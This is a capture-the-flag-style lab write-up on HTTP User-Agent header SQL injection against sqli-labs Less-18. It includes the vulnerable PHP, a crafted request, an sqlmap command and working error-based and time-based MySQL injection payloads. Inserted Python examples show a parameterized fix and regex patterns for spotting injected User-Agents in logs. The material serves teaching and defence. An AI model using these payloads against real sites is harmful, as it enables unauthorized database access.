I played around with HTTP header injection and found that it is both quite damaging and quite stealthy, but also hard to exploit: doing it purely by hand I basically would not know where to start, so this time the injection had to be done with sqlmap.
First, a look at the code:
$sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);
if($row1)
{
    echo '<font color= "#FFFF00" font size = 3 >';
    $insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
    mysql_query($insert);
    //echo 'Your IP ADDRESS is: ' .$IP;
    echo "</font>";
    //echo "<br>";
    echo '<font color= "#0000ff" font size = 3 >';
    echo 'Your User Agent is: ' .$uagent;
    echo "</font>";
    echo "<br>";
    print_r(mysql_error());
    echo "<br><br>";
    echo '<img src="../images/flag.jpg" />';
    echo "<br>";
}
else
{
    echo '<font color= "#0000ff" font size="3">';
    //echo "Try again looser";
    print_r(mysql_error());
    echo "</br>";
    echo "</br>";
    echo '<img src="../images/slap.jpg" />';
    echo "</font>";
}
}
I did not bother capturing the other parts. In short, the code first checks username and passwd, and if a row comes back it outputs 'Your User Agent is: ' .$uagent;
Since this is called HTTP header injection, the injection point is basically right here, and the code confirms it: the HTTP_USER_AGENT environment variable comes in with no filtering at all and is used directly in the INSERT, and the code also outputs mysql_error(), so my idea was error-based injection.
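To show the root cause and the fix side by side, here is an added Python analogue of the PHP above (not the post's code, and not sqli-labs code). It assumes an in-memory SQLite database standing in for MySQL; the `uagents` table and its columns are taken from the post, the sample User-Agent values are constructed. The unsafe function splices the header into SQL exactly as the PHP does; the safe one uses placeholders. Any error text is returned to the caller for logging rather than echoed, which is the other defect the post relies on (mysql_error() printed to the page).

```python
import sqlite3

# Constructed sample header values: the lone quote the post sends, and a benign browser UA.
SAMPLE_UAGENTS = ["'", "Mozilla/5.0 (X11; Linux x86_64)"]


def make_db():
    """In-memory stand-in (assumption: SQLite, not MySQL) for `security`.`uagents`."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE uagents (uagent TEXT, ip_address TEXT, username TEXT)")
    return conn


def insert_unsafe(conn, uagent, ip, uname):
    """Mirrors the post's PHP: the header value is spliced straight into the statement.
    A quote in the User-Agent terminates the string literal and changes the SQL."""
    sql = (f"INSERT INTO uagents (uagent, ip_address, username) "
           f"VALUES ('{uagent}', '{ip}', '{uname}')")
    conn.execute(sql)


def insert_safe(conn, uagent, ip, uname):
    """Hardened form: placeholders keep the header value as data, whatever it contains."""
    conn.execute(
        "INSERT INTO uagents (uagent, ip_address, username) VALUES (?, ?, ?)",
        (uagent, ip, uname),
    )


def try_insert(fn, uagent):
    """Run one insert and report ("ok", stored_value) or ("error", message).

    The message is what mysql_error() leaked to the client in the post; a hardened
    handler logs it server-side and shows the user a generic failure page."""
    conn = make_db()
    try:
        fn(conn, uagent, "192.168.150.1", "admin")
    except sqlite3.Error as exc:
        return ("error", str(exc))
    row = conn.execute("SELECT uagent FROM uagents").fetchone()
    return ("ok", row[0])


def compare(uagents=SAMPLE_UAGENTS):
    """For each sample UA, the outcome of the unsafe and the safe insert."""
    return {
        ua: {"unsafe": try_insert(insert_unsafe, ua), "safe": try_insert(insert_safe, ua)}
        for ua in uagents
    }


if __name__ == "__main__":
    for ua, outcome in compare().items():
        print(repr(ua), outcome)
```

With the lone quote, the unsafe path fails with a syntax error (the same class of error the post's Burp response shows), while the safe path stores the quote verbatim; the benign UA succeeds on both paths.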
First, construct the POST request:
POST /sql/Less-18/?id=1 HTTP/1.1
Host: 192.168.150.129
User-Agent: '
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.150.129/sql/Less-18/?id=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 38

uname=admin&passwd=admin&submit=Submit
I used the weak credential admin, and it turned out afterwards that I was right. Because the User-Agent value is a single quote, it should produce an error; here is the response as shown in Burp Suite:
<br>Your IP ADDRESS is: 192.168.150.1<br><font color= "#FFFF00" font size = 3 ></font><font color= "#0000ff" font size = 3 >Your User Agent is: '</font><br>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '192.168.150.1', 'admin')' at line 1<br><br><img src="../images/flag.jpg" /><br>
It errored. At this point, save the POST request and throw it into sqlmap:
root@Lang:~# sqlmap -r '/root/Desktop/1' --headers="User-Agent:*" --banner
This way sqlmap tests the User-Agent header:
custom injection marking character ('*') found in option '--headers/--user-agent/--referer/--cookie'. Do you want to process it? [Y/n/q] y
Then let it keep running, and the result comes out:
(custom) HEADER parameter 'User-Agent #1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 287 HTTP(s) requests:
---
Parameter: User-Agent #1* ((custom) HEADER)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: ' AND (SELECT 4391 FROM(SELECT COUNT(*),CONCAT(0x71716b7a71,(SELECT (CASE WHEN (4391=4391) THEN 1 ELSE 0 END)),0x717a7a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'BVRp'='BVRp

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: ' AND (SELECT * FROM (SELECT(SLEEP(5)))JPDK) AND 'qTgm'='qTgm
---
[22:55:44] [INFO] the back-end DBMS is MySQL
It gives explicit payloads.
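From the defender's side, both the single-quote probe and the sqlmap payloads above show up in the web server's access log, because the combined log format records the User-Agent, and the verbose MySQL error in the Burp response is what makes error-based injection work at all. The following added Python example (not from the post or from sqlmap) scans constructed Apache combined-format log lines for User-Agent values a browser would never send, and separately checks a response body for leaked DBMS error text. The payload strings and the response body are copied from the post; the timestamps, sizes and the benign UA are constructed.

```python
import re
from dataclasses import dataclass

# Constructed Apache "combined" access-log lines. The User-Agent is the last quoted
# field; the two payload UAs are the ones sqlmap reported in the post.
SAMPLE_LOG = """\
192.168.150.1 - - [10/May/2015:22:50:01 +0800] "POST /sql/Less-18/?id=1 HTTP/1.1" 200 812 "http://192.168.150.129/sql/Less-18/?id=1" "Mozilla/5.0 (X11; Linux x86_64) Firefox/38.0"
192.168.150.1 - - [10/May/2015:22:51:12 +0800] "POST /sql/Less-18/?id=1 HTTP/1.1" 200 903 "http://192.168.150.129/sql/Less-18/?id=1" "'"
192.168.150.1 - - [10/May/2015:22:55:30 +0800] "POST /sql/Less-18/?id=1 HTTP/1.1" 200 955 "http://192.168.150.129/sql/Less-18/?id=1" "' AND (SELECT 4391 FROM(SELECT COUNT(*),CONCAT(0x71716b7a71,(SELECT (CASE WHEN (4391=4391) THEN 1 ELSE 0 END)),0x717a7a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'BVRp'='BVRp"
192.168.150.1 - - [10/May/2015:22:55:44 +0800] "POST /sql/Less-18/?id=1 HTTP/1.1" 200 812 "http://192.168.150.129/sql/Less-18/?id=1" "' AND (SELECT * FROM (SELECT(SLEEP(5)))JPDK) AND 'qTgm'='qTgm"
"""

# The response body the post captured in Burp Suite.
SAMPLE_RESPONSE = """<br>Your IP ADDRESS is: 192.168.150.1<br><font color= "#FFFF00" font size = 3 ></font><font color= "#0000ff" font size = 3 >Your User Agent is: '</font><br>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '192.168.150.1', 'admin')' at line 1<br><br><img src="../images/flag.jpg" /><br>"""

COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Patterns a browser User-Agent has no reason to contain. The order is fixed so the
# reported indicator list is stable.
INDICATORS = [
    ("quote_then_logic", re.compile(r"'\s*(AND|OR)\s+", re.I)),
    ("sql_keyword", re.compile(r"\b(SELECT|UNION|FROM|WHERE|GROUP\s+BY|INFORMATION_SCHEMA)\b", re.I)),
    ("mysql_function", re.compile(r"\b(SLEEP|BENCHMARK|CONCAT|FLOOR|RAND|COUNT|EXTRACTVALUE|UPDATEXML)\s*\(", re.I)),
    ("hex_literal", re.compile(r"\b0x[0-9a-f]{6,}\b", re.I)),
]

# Raw DBMS error text in a response body: what mysql_error() leaked in the post.
DB_ERROR_RE = re.compile(
    r"You have an error in your SQL syntax|check the manual that corresponds to your MySQL|Warning: mysql_",
    re.I,
)


@dataclass
class Finding:
    ip: str
    ts: str
    ua: str
    indicators: list


def classify_ua(ua: str) -> list:
    """Return the indicator names that fire on one User-Agent value."""
    hits = []
    # An unpaired quote is the classic first probe; the post's first UA is just "'".
    if ua.count("'") % 2 == 1:
        hits.append("unbalanced_quote")
    for name, rx in INDICATORS:
        if rx.search(ua):
            hits.append(name)
    return hits


def scan_log(text: str) -> list:
    """Parse combined-format lines and report every request with a suspicious UA."""
    findings = []
    for line in text.splitlines():
        m = COMBINED_RE.match(line)
        if not m:
            continue
        hits = classify_ua(m["ua"])
        if hits:
            findings.append(Finding(m["ip"], m["ts"], m["ua"], hits))
    return findings


def leaks_db_error(body: str) -> bool:
    """True when a response body carries raw DBMS error text that should never reach a client."""
    return DB_ERROR_RE.search(body) is not None


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f.ts, f.ip, f.indicators, repr(f.ua))
    print("response leaks DB error:", leaks_db_error(SAMPLE_RESPONSE))
```

Note that the finished sqlmap payloads keep their quotes balanced, so quote parity alone only catches the initial probe; the keyword and function patterns are what flag the payloads. The time-based payload is also detectable from latency if the log format records request duration, which the combined format does not.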
Finally, the result:
web server operating system: Linux Debian 7.0 (wheezy)
web application technology: Apache 2.2.22, PHP 5.4.39
back-end DBMS: MySQL 5.0
banner: '5.5.43-0+deb7u1'
That is the most basic exploitation of HTTP header injection. However much the details vary, the principle stays the same: once you have mastered the fundamentals, going deeper will be easy, because the advanced material is all built on them.